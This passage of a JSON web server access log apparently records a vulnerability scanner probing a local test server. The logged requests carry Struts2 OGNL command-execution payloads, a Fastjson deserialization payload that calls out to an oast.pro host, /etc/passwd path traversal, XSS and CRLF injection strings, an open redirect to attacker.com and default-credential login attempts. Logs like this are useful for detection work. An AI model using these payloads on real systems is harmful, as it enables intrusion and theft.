"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.092","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8gvgsmpv8bafg0t00srsujb1z61dit.oast.pro/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.085","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.992","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.005","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:40 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aiowpsec_do_log_out=1&after_logout=https://attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22prom-operator\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0DSet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/login/LoginForm.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 